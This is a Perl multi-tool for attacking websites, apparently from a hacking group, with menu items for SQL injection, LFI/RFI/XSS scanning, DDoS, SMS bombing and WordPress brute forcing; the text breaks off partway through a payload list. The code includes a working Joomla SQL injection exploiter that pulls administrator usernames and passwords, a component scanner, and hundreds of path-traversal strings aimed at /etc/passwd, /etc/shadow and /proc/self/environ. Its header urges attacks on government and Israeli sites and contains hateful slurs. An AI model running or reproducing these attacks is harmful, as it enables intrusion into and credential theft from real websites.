KARTOUCH MultiSCanner (WP,Joomla)..

1. #!/usr/bin/perl
2. #Salam 3alaykoum
3. # !'m Fallagcrx From Tn Fallaga Team MEmbers | 2017 | #K4rT0uCh Pl = R3C0D3D By Me
4. #[#]Find Shell/Admin Panel 's Link
5. #[#]SC4N The SQLI
6. #[#]JoomLa Componet Sc4nner / WPPlugin CHecker
7. #[#]Lfi/Xss/RFi With Big Targets
8. #[#]DDos Att4aCk |R3s3eve Ip :v
9. #[#]SmS BomBer/ProXy Grabber
10. # Free Palastine <3 Fuck Fuck Fuck Fuck Fuck Fuck Fuck Fuck Fuck Fuck Israel :v
11. # Please Contact Me Or Donate Me In The Link :
12. # Fb Link : http://www.facebook.com/X.cripton.x : Name : Mohamed Crx
13. #Email : Fallag.crx@mail.ru | crx31824@gmail.com
14. # My Youtube channel : Fallag crx
15. # Thnx For All Muslimn Hackers :*
16. #  (c) Copyright :/
17. use HTTP::Request;
18. use LWP::UserAgent;
19. use Digest::MD5;
20. use MIME::Base64;
21. use LWP::Simple;
22. use IO::Socket;
23. use HTTP::Request::Common;
24. use Term::ANSIColor;
25. system('cls');
26. system('title Fallaga Team');
27. print color("white"),"==========================================================\n";
28. print color("red"),"      root@fallaga:~#perl kartouch.pl   \n";
29. print color("red"),"      [+] Fallaga Team | Fallag crx  [+]      \n";
30. print color("red"), "     Test it In co.il _ co.uk __ gov __ https *.* < try mdr >    \n";
31. print color("white"), "==========================================================\n";
32. print color("green"),"[1] Shell Finder\n";
33. print color("green"),"[2] Admin Finder\n";
34. print color("green"), "[3] Dorker Bing\n";
35. print color("green"), "[4] Lfi Rfi Xss Scanner\n";
36. print color("green"), "[5] Joomla Component Scanner\n";
37. print color("green"), "[6] SMS Bomber\n";
38. print color("green"), "[7] Proxy Grabber\n";
39. print color("green"), "[8] Wordpress Plugin Checker\n";
40. print color("green"), "[9] Jce Server Scanner\n";
41. print color("green"), "[10] Md5 Cracker Online\n";
42. print color("green"), "[11] FckEditor Dir Tester\n";
43. print color("green"), "[12] Sqli Scanner\n";
44. print color("green"), "[13] Wordpress Site Finder\n";
45. print color("green"), "[14] Wordpress BruteFoce\n";
46. print color("green"), "[15] Joomla Sql Injection Tester\n";
47. print color("green"), "[16] DDOS\n";
48. print color("green"), "[17] Reverse IP\n";
49. print color("green"), "[1x] About Me\n\n";
50. print "[+] Choose Number : ";
51. my $targett = <>;
52. chomp $targett;
53. if($targett eq '15')
54. {
55. system('cls');
56. system('title Joomla Sqli Injection Tester');
57. use LWP::Simple;
58. use LWP::UserAgent;
59. use HTTP::Cookies;
60. use POSIX qw(strftime);
61. use Term::ANSIColor qw(:constants);
62.  
63. if($^O =~ /Win/){
64. system("cls");
65. }else{
66. system("clear");
67. }
68. my $date = localtime();
69. my ($sec,$min,$hour,$day,$mon,$year,$wday,$yday,$isdst)=localtime(time);
70. print RED, q {
71.  
72. W E _ K I L L _ A N N I M A L S
73.  
74. };
75. print RESET;
76.  
77. $target = $ARGV[0];
78. #loooooooool :v
79. @vuln = (
80. "/index.php?option=com_jobprofile&Itemid=61&task=profilesview&id=-1",
81. "/index.php?tmpl=component&option=com_redshop&view=product&task=addtocompare&pid=-24",
82. "/index.php?option=com_virtuemart&view=user&task=removeAddressST&virtuemart_userinfo_id=-16",
83. "/index.php?option=com_jvideoclip&view=search&type=user&uid=-1",
84. "/index.php?option=com_mamml&listid=-1",
85. "/index.php?option=com_fq&Itemid=3&listid=-9999999",
86. "/index.php?option=com_listing&task=browse&category_id=-1",
87. "/index.php?option=com_techfolio&view=techfoliodetail&catid=-1",
88. "/index.php?option=com_tupinambis&task=verproyecto&proyecto=-1",
89. "/index.php?option=com_tupinambis&task=verproyecto&proyecto=-1",
90. "/index.php?option=com_hwdvideoshare&func=viewcategory&Itemid=2&cat_id=-1",
91. "/index.php?option=com_pccookbook&page=viewuserrecipes&user_id=-1",
92. "/index.php?option=com_clasifier&Itemid=1&cat_id=-1",
93. "/index.php?option=com_jooget&Itemid=2&task=detail&id=-1",
94. "/index.php?option=com_galeria&Itemid=7&func=detail&id=-1",
95. "/index.php?option=com_paxxgallery&Itemid=85&gid=7&userid=1&task=view&iid=-1",
96. "/index.php?option=com_mcquiz&task=user_tst_shw&Itemid=1&tid=-1",
97. "/index.php?option=com_quiz&task=user_tst_shw&Itemid=1&tid=-1",
98. "/index.php?option=com_xfaq&task=answer&Itemid=1&catid=97&aid=-1",
99. "/index.php?option=com_gallery&Itemid=0&func=detail&id=-1",
100. "/index.php?option=com_rapidrecipe&page=showuser&user_id==1",
101. "/index.php?option=com_downloads&Itemid=10&func=selectfolder&filecatid=-1",
102. "/index.php?option=com_shambo2&Itemid=-1",
103. "/index.php?option=com_neoreferences&Itemid=27&catid=-1",
104. "/index.php?option=com_akogallery&Itemid=11&func=detail&id=-1",
105. "/index.php?option=com_catalogshop&Itemid=13&func=detail&id=-1",
106. "/index.php?option=com_restaurant&Itemid=10&func=detail&id=-1",
107. "/index.php?option=com_musepoes&task=answer&Itemid=1&catid=2&aid=-1",
108. "/index.php?option=com_recipes&Itemid=2&func=detail&id=-1",
109. "/index.php?option=com_jokes&Itemid=1&func=CatView&cat=-1",
110. "/index.php?option=com_estateagent&Itemid=21&func=showObject&info=contact&objid=-1",
111. "/index.php?option=com_newsletter&Itemid=1&listid=-9999999"
112. );
113. @sqli = ('+union+all+select+1,concat_ws(0x3a,usertype,username,password),3,4,5,6,7,8,9+from+jos_users'
114. #,'/**/union/**/select/**/0,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,username/**/from/**/mos_users/*'
115. #,'/**/union/**/select/**/0,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,username/**/from/**/jos)users/*'
116. #,'/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password)/**/from/**/mos_users/*'
117. #,'/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password)/**/from/**/jos_users/*'
118. #,'+union+select+1,2,3,concat_ws(0x3a,username,password)fallag,5,6,7,8,9,10,11+from+mos_users--'
119. #,'+union+select+1,2,3,concat_ws(0x3a,username,password)fallag,5,6,7,8,9,10,11+from+jos_users--'
120. );
121. print GREEN, q(
122.  Joomla SQLi Exploiter
123.  Contact me at : fallag.crx@mail.ru
124.  crx Team Here!!
125. );
126. chomp $target;
127.  
128. print "[+] Enter Joomla Site: ";
129. chomp ($target = <STDIN>);
130. print RESET;
131. print YELLOW, "-----------------------------------------------------------------------------------------------
132. [!] Atacking info
133. -----------------------------------------------------------------------------------------------
134. [!] Target  : $target
135. [!] Method  : SQL injection
136. [!] Started : $hour:$min:$sec\n";
137. print "-----------------------------------------------------------------------------------------------
138. [!] Exploiting $target...
139. [!] Please wait bitch!\n";
140. print RESET;
141. foreach $vuln(@vuln){
142. foreach $sqli(@sqli){
143. $expl = "http://" . $target . $vuln . $sqli;
144. $req   = HTTP::Request->new(GET=>$expl);
145. $ua = LWP::UserAgent->new(keep_alive => 1);
146. $ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12");
147. $ua->timeout (10);
148. $ua->cookie_jar(
149. HTTP::Cookies->new(
150. file => 'cookies.txt',
151. autosave => 1
152. )
153. );
154. $res = $ua->request($req);
155. if ($res->is_success) {
156. $res   = $res->content;
157. if ($res =~ /Administrator:(.*):(.*)/) {
158. #if ($res =~ m/:/g) {
159. ($user) = ($1);
160. my ($sec,$min,$hour)=localtime();
161. print "-----------------------------------------------------------------------------------------------";
162. print GREEN, "
163. [$hour:$min:$sec]
164. [+] Exploit Succes !";
165. print ON_BLUE, GREEN, "
166. [+] $user\n";
167. printlog ("
168. Joomla SQLi Log
169. Date     : $date
170. Target   : $expl
171. Exploit  : $user\n
172. ");
173. print RESET;
174. print YELLOW, "-----------------------------------------------------------------------------------------------\n";
175. print RESET;
176. exit;
177. }
178. }
179. }}
180. print YELLOW, "-----------------------------------------------------------------------------------------------\n";
181. print RESET;
182. my ($sec,$min,$hour)=localtime();
183. print BLUE, "[$hour:$min:$sec]
184. [-] Exploit SQLi at $target failed! \n";
185. print RESET;
186. print YELLOW, "-----------------------------------------------------------------------------------------------\n";
187.  
188. sub printlog
189. {
190. my ($logsec,$logmin,$loghour,$logmday,$logmon,$logyear,$logwday,$logyday,$logisdst)=localtime(time);
191. my $logtimestamp = sprintf("%4d-%02d-%02d,%02d:%02d:%02d",$logyear+1900,$logmon+1,$logmday,$loghour,$logmin,$logsec);
192. $logmon++;
193. $logyear=$logyear+1900;
194. my $log="[$logdir$logyear-$logmon-$logmday]SQLi.log";
195. open(lo,">>$log") or die "$log:$!";
196. print lo @_[0];
197. close(lo);
198. return;
199. }}
200. if($targett eq '5')
201. {
202. system('cls');
203. system('title Joomla Component Scanner');
204. package control;
205. use HTTP::Request;
206. use LWP::UserAgent;
207.  
208. system('cls');
209. system(' Title Files and Directory Scanner ');
210. system "color a";
211. print"\n";
212. print  "\t>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n";
213. print "\t>                    Joomla Component Scanner                      >\n";
214. print "\t>                                                                  >\n";
215. print "\t>                        Fallag crx                        >\n";
216. print "\t>           fallaga Team | crypton_x               >\n";
217. print "\t>                         Result In com.txt                        >\n";
218. print  "\t>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n";
219. print "\n";
220.  
221. print " Scan Your site Site\n\n Example: www.victim.com \n\n-> ";
222.  
223.  
224. $site=<STDIN>;
225. chomp $site;
226.  
227. if($site !~ /http:\/\//) { $site = "http://$site/"; };
228.  
229. print "\n";
230. @path = ('/components/com_tag',
231. '/components/com_virtuemart',
232. '/components/com_jvehicles',
233. '/components/com_s5clanroster',
234. '/components/com_fireboard',
235. '/components/com_fabrik',
236. '/components/com_jinc',
237. '/components/com_xcloner-backupandrestore',
238. '/components/com_dshop',
239. '/components/com_ponygallery',
240. '/components/com_bearleague',
241. '/components/com_obsuggest',
242. '/components/com_alameda',
243. '/components/com_estateagent',
244. '/components/com_collector',
245. '/components/com_qcontacts',
246. '/components/com_niceajaxpoll',
247. '/components/com_xmap',
248. '/components/com_team',
249. '/components/com_joomnik',
250. '/components/com_question',
251. '/components/com_jmsfileseller',
252. '/components/com_rsfiles',
253. '/components/com_versioning',
254. '/components/com_hello',
255. '/components/com_calcbuilder',
256. '/components/com_jmsfileseller',
257. '/components/com_xmovie',
258. '/components/com_people',
259. '/components/com_idoblog',
260. '/components/com_adsmanager',
261. '/components/com_xgallery',
262. '/components/com_alfurqan15x',
263. '/components/com_alfurqan',
264. '/components/com_billyportfolio',
265. '/components/com_jimtawl',
266. '/components/com_content',
267. '/components/com_jfuploader',
268. '/components/com_kunena',
269. '/components/com_jooproperty',
270. '/components/com_jsupport',
271. '/components/com_markt',
272. '/components/com_img',
273. '/components/com_clanlist',
274. '/components/com_clan',
275. '/components/com_ckforms',
276. '/components/com_dcnews',
277. '/components/com_connect',
278. '/components/com_rsappt_pro2',
279. '/components/com_techfolio',
280. '/components/com_zcalendar',
281. '/components/com_tpjobs',
282. '/components/com_simpleshop',
283. '/components/com_sef',
284. '/components/com_searchlog',
285. '/components/com_contact',
286. '/components/com_enmasse',
287. '/components/com_elite_experts',
288. '/components/com_ezautos',
289. '/components/com_jgen',
290. '/components/com_jphone',
291. '/components/com_mosets',
292. '/components/com_jefaqpro',
293. '/components/com_picsell',
294. '/components/com_ongallery',
295. '/components/com_equipment',
296. '/components/com_zoomportfolio',
297. '/components/com_amblog',
298. '/components/com_joltcard',
299. '/components/com_jp_jobs',
300. '/components/com_bfquiztrial',
301. '/components/com_qpersonel',
302. '/components/com_pandafminigames',
303. '/components/com_golfcourseguid',
304. '/components/com_jejob',
305. '/components/com_jeajaxeventcalendar',
306. '/components/com_jradio',
307. '/components/com_spidercatalog',
308. '/components/com_/components/commedia',
309. '/components/com_fss',
310. '/components/com_icagenda',
311. '/components/com_spidercalendar',
312. '/components/com_joomgalaxy',
313. '/components/com_ornekek',
314. '/components/com_weblinks',
315. '/components/com_rokmodule',
316. '/components/com_discussions',
317. '/components/com_hm/components/community',
318. '/components/com_eslamiat',
319. '/components/com_listing',
320. '/components/com_jeemasms',
321. '/components/com_yjcontactus',
322. '/components/com_timereturns',
323. '/components/com_jce',
324. '/components/com_joomtouch',
325. '/components/com_jdirectory',
326. '/components/com_jesubmit',
327. '/components/com_sobi2',
328. '/components/com_acooldebate',
329. '/components/com_booklibrary',
330. '/components/com_acymailing',
331. '/components/com_doqment',
332. '/components/com_allcinevid',
333. '/components/com_jotloader',
334. '/components/com_jeauto',
335. '/components/com_ccboard',
336. '/components/com_ccinvoices',
337. '/components/com_flipwall',
338. '/components/com_sponsorwall',
339. '/components/com_cbe',
340. '/components/com_jscalendar',
341. '/components/com_restaurantguide',
342. '/components/com_nkc',
343. '/components/com_aardvertiser',
344. '/components/com_clantools',
345. '/components/com_remository',
346. '/components/com_dateconverter',
347. '/components/com_wmtpic',
348. '/components/com_donateprocess',
349. '/components/com_gamesbox',
350. '/components/com_jcafe',
351. '/components/com_awd_song',
352. '/components/com_picasa2gallery',
353. '/components/com_ybggal',
354. '/components/com_joomdocs',
355. '/components/com_answers',
356. '/components/com_galleryxml',
357. '/components/com_oziogallery2',
358. '/components/com_listbingo',
359. '/components/com_easygb',
360. '/components/com_jtickets',
361. '/components/com_jesectionfinder',
362. '/components/com_realtyna',
363. '/components/com_/components/community',
364. '/components/com_jomestate',
365. '/components/com_jtickets',
366. '/components/com_cinema',
367. '/components/com_jstore',
368. '/components/com_annonces',
369. '/components/com_lead',
370. '/components/com_sar_news',
371. '/components/com_chronocontact',
372. '/components/com_chronoconnectivity',
373. '/components/com_djartgallery',
374. '/components/com_quran',
375. '/components/com_g2bridge',
376. '/components/com_reservations',
377. '/components/com_jepoll',
378. '/components/com_mycar',
379. '/components/com_mediqna',
380. '/components/com_zelig',
381. '/components/com_bookmarks',
382. '/components/com_hotproperty',
383. '/components/com_jombib',
384. '/components/com_store',
385. '/components/com_mosforms',
386. '/components/com_/components/comprofiler',
387. '/components/com_crowdsource',
388. '/components/com_camp',
389. '/components/com_ms/components/comment',
390. '/components/com_extcalendar',
391. '/components/com_imoti',
392. '/components/com_product',
393. '/components/com_event',
394. '/components/com_simpledownload',
395. '/components/com_news',
396. '/components/com_article',
397. '/components/com_jequoteform',
398. '/components/com_konsultasi',
399. '/components/com_sebercart',
400. '/components/com_php',
401. '/components/com_jinc',
402. '/components/com_mytube',
403. '/components/com_jbudgetsmagic',
404. '/components/com_surveymanager',
405. '/components/com_jreservation',
406. '/components/com_foobla_suggestions',
407. '/components/com_djcatalog',
408. '/components/com_turtushout',
409. '/components/com_alphauserpoints',
410. '/components/com_lucygames',
411. '/components/com_bfsurvey_profree',
412. '/components/com_tpdugg',
413. '/components/com_joomloc',
414. '/components/com_joomlub',
415. '/components/com_artportal',
416. '/components/com_agora',
417. '/components/com_gameserver',
418. '/components/com_digifolio',
419. '/components/com_bca-rss-syndicator',
420. '/components/com_expose',
421. '/components/com_equotes',
422. '/components/com_media',
423. '/components/com_misterestate',
424. '/components/com_wrapper',
425. '/components/com_mailto',
426. '/components/com_autartimonial',
427. '/components/com_artforms',
428. '/components/com_redshop',
429. '/components/com_staticxt',
430. '/components/com_spa',
431. '/components/com_jomtube',
432. '/components/com_golfcourseguide',
433. '/components/com_huruhelpdesk',
434. '/components/com_joomdle',
435. '/components/com_youtube',
436. '/components/com_joomla-visites',
437. '/components/com_ttvideo',
438. '/components/com_appointinator',
439. '/components/com_photomapgallery',
440. '/components/com_spielothek',
441. '/components/com_pbbooking',
442. '/components/com_beamospetition',
443. '/components/com_neorecruit',
444. '/components/com_cgtestimonial',
445. '/components/com_jgrid',
446. '/components/com_zina',
447. '/components/com_pro_desk',
448. '/components/com_user',
449. '/components/com_k2',
450. '/components/com_rsbook_15',
451. '/components/com_gk3_photoslide',
452. '/components/com_jvideodirect',
453. '/components/com_jcalpro',
454. '/components/com_banners',
455. '/components/com_datsogallery',
456. '/components/com_joomradio',
457. '/components/com_jfbconnect',
458. '/components/com_myblog',
459. '/components/com_phocamaps',
460. '/components/com_contact_enhanced',
461. '/components/com_aicontactsafe',
462. '/components/com_poll',);
463.  
464.  
465. foreach $com(@path){
466.  
467. $url = $site.$com;
468. $req = HTTP::Request->new(GET=>$url);
469. $useragent = LWP::UserAgent->new();
470.  
471. $response = $useragent->request($req);
472.  
473. if ($response->is_success){
474. print "$com\n";
475.  $url = substr($url, $com + 13);
476.  $com = substr($url, 0, index($url, '"'));
477.  open (txt,">>com.txt");
478.  print txt  $com,"\n";
479.  close(txt);
480. print "=> Dir Found : $url\n";
481. }
482. else {
483. print "=> Not Found : $com\n";
484. }}
485. }
486.  
487. if($targett eq '4')
488. {
489. system('cls');
490. system('title Lfi Rfi Xss Scanner');
491.                     {
492. use LWP::Simple;
493. system(($^O eq 'MSWin32') ? 'cls' : 'clear');
494. print "#############################################################";
495. print "\n\t\t Fallaga Scanner [XSS - LFI - RFI]";
496. print "\n\t\t <<<  Fallaga | Team  >>>";
497. print "\n\t\t ReCode By Fallag crx";
498. sleep (1);
499. print "\n\n\t\t crypton_x Menu ";
500. print "\n \t\t 1- XSS SCAN ";
501. print "\n \t\t 2- LFI SCAN ";
502. print "\n \t\t 3- RFI SCAN (FOR JOOMLA) ";
503. print "\n \t\t 4- XSS & LFI ";
504. print  "\n\n \t\t 5- Exit\n";
505. print "\n Choose :";
506. $ID =<STDIN>;
507. ######
508. @LFI =("/etc/passwd","../etc/passwd","../../etc/passwd","../../../etc/passwd","../../../../etc/passwd","../../../../../etc/passwd","../../../../../../etc/passwd","../../../../../../../etc/passwd","../../../../../../../../etc/passwd","../../../../../../../../../etc/passwd","../../../../../../../../../../etc/passwd","/etc/passwd%00","../etc/passwd%00","../../etc/passwd%00","../../../etc/passwd%00","../../../../etc/passwd%00","../../../../../etc/passwd%00","../../../../../../etc/passwd%00","../../../../../../../etc/passwd%00","../../../../../../../../etc/passwd%00","../../../../../../../../../etc/passwd%00","../../../../../../../../../../etc/passwd%00","....//etc/passwd","....//....//etc/passwd","....//....//....//etc/passwd","....//....//....//....//etc/passwd","....//....//....//....//....//etc/passwd","....//....//....//....//....//....//etc/passwd","....//....//....//....//....//....//....//etc/passwd","....//....//....//....//....//....//....//....//etc/passwd","....//....//....//....//....//....//....//....//....//etc/passwd","....//....//....//....//....//....//....//....//....//....//etc/passwd","....//etc/passwd%00","....//....//etc/passwd%00","....//....//....//etc/passwd%00","....//....//....//....//etc/passwd%00","....//....//....//....//....//etc/passwd%00","....//....//....//....//....//....//etc/passwd%00","....//....//....//....//....//....//....//etc/passwd%00","....//....//....//....//....//....//....//....//etc/passwd%00","....//....//....//....//....//....//....//....//....//etc/passwd%00","....//....//....//....//....//....//....//....//....//....//etc/passwd%00","%2Fetc%2Fpasswd","..%2Fetc%2Fpasswd","..%2F..%2Fetc%2Fpasswd","..%2F..%2F..%2Fetc%2Fpasswd","..%2F..%2F..%2F..%2Fetc%2Fpasswd","..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd","%2Fetc%2Fpasswd%00","..%2Fetc%2Fpasswd%00","..%2F..%2Fetc%2Fpasswd%00","..%2F..%2F..%2Fetc%2Fpasswd%00","..%2F..%2F..%2F..%2Fetc%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00","....%2f%2Fetc/passwd","....%2f%2F....%2f%2Fetc/passwd","....%2f%2F....%2f%2F....%2f%2Fetc/passwd","....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd","....%2f%2Fetc/passwd%00","....%2f%2F....%2f%2Fetc/passwd%00","....%2f%2F....%2f%2F....%2f%2Fetc/passwd%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd%00","/proc/self/environ","../proc/self/environ","../../proc/self/environ","../../../proc/self/environ","../../../../proc/self/environ","../../../../../proc/self/environ","../../../../../../proc/self/environ","../../../../../../../proc/self/environ","../../../../../../../../proc/self/environ","../../../../../../../../../proc/self/environ","../../../../../../../../../../proc/self/environ","/proc/self/environ%00","../proc/self/environ%00","../../proc/self/environ%00","../../../proc/self/environ%00","../../../../proc/self/environ%00","../../../../../proc/self/environ%00","../../../../../../proc/self/environ%00","../../../../../../../proc/self/environ%00","../../../../../../../../proc/self/environ%00","../../../../../../../../../proc/self/environ%00","../../../../../../../../../../proc/self/environ%00","%2Fproc%2Fself%2Fenviron","..%2Fproc%2Fself%2Fenviron","..%2F..%2Fproc%2Fself%2Fenviron","..%2F..%2F..%2Fproc%2Fself%2Fenviron","..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron","..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron","..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron","%2Fproc%2Fself%2Fenviron%00","..%2Fproc%2Fself%2Fenviron%00","..%2F..%2Fproc%2Fself%2Fenviron%00","..%2F..%2F..%2Fproc%2Fself%2Fenviron%00","..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron%00","..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron%00","..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron%00","//proc/self/environ","....//proc/self/environ","....//....//proc/self/environ","....//....//....//proc/self/environ","....//....//....//....//proc/self/environ","....//....//....//....//....//proc/self/environ","....//....//....//....//....//....//proc/self/environ","....//....//....//....//....//....//....//proc/self/environ","....//....//....//....//....//....//....//....//proc/self/environ","....//....//....//....//....//....//....//....//....//proc/self/environ","....//....//....//....//....//....//....//....//....//....//proc/self/environ","//proc/self/environ%00","....//proc/self/environ%00","....//....//proc/self/environ%00","....//....//....//proc/self/environ%00","....//....//....//....//proc/self/environ%00","....//....//....//....//....//proc/self/environ%00","....//....//....//....//....//....//proc/self/environ%00","....//....//....//....//....//....//....//proc/self/environ%00","....//....//....//....//....//....//....//....//proc/self/environ%00","....//....//....//....//....//....//....//....//....//proc/self/environ%00","....//....//....//....//....//....//....//....//....//....//proc/self/environ%00","%2f%2Fproc/self/environ","....%2f%2Fproc/self/environ","....%2f%2F....%2f%2Fproc/self/environ","....%2f%2F....%2f%2F....%2f%2Fproc/self/environ","....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ","%2f%2Fproc/self/environ%00","....%2f%2Fproc/self/environ%00","....%2f%2F....%2f%2Fproc/self/environ%00","....%2f%2F....%2f%2F....%2f%2Fproc/self/environ%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ%00","/etc/shadow","../etc/shadow","../../etc/shadow","../../../etc/shadow","../../../../etc/shadow","../../../../../etc/shadow","../../../../../../etc/shadow","../../../../../../../etc/shadow","../../../../../../../../etc/shadow","../../../../../../../../../etc/shadow","../../../../../../../../../../etc/shadow","/etc/shadow%00","../etc/shadow%00","../../etc/shadow%00","../../../etc/shadow%00","../../../../etc/shadow%00","../../../../../etc/shadow%00","../../../../../../etc/shadow%00","../../../../../../../etc/shadow%00","../../../../../../../../etc/shadow%00","../../../../../../../../../etc/shadow%00","../../../../../../../../../../etc/shadow%00","%2Fetc..%2Fshadow","..%2Fetc%2Fshadow","..%2F..%2Fetc%2Fshadow","..%2F..%2F..%2Fetc%2Fshadow","..%2F..%2F..%2F..%2Fetc%2Fshadow","..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow","..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow","%2Fetc..%2Fshadow%00","..%2Fetc%2Fshadow%00","..%2F..%2Fetc%2Fshadow%00","..%2F..%2F..%2Fetc%2Fshadow%00","..%2F..%2F..%2F..%2Fetc%2Fshadow%00","..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow%00","..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow%00","%2F%2Fetc/shadow","....%2f%2Fetc/shadow","....%2f%2F....%2f%2Fetc/shadow","....%2f%2F....%2f%2F....%2f%2Fetc/shadow","....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow","....%2f%2F....%2f%2F....%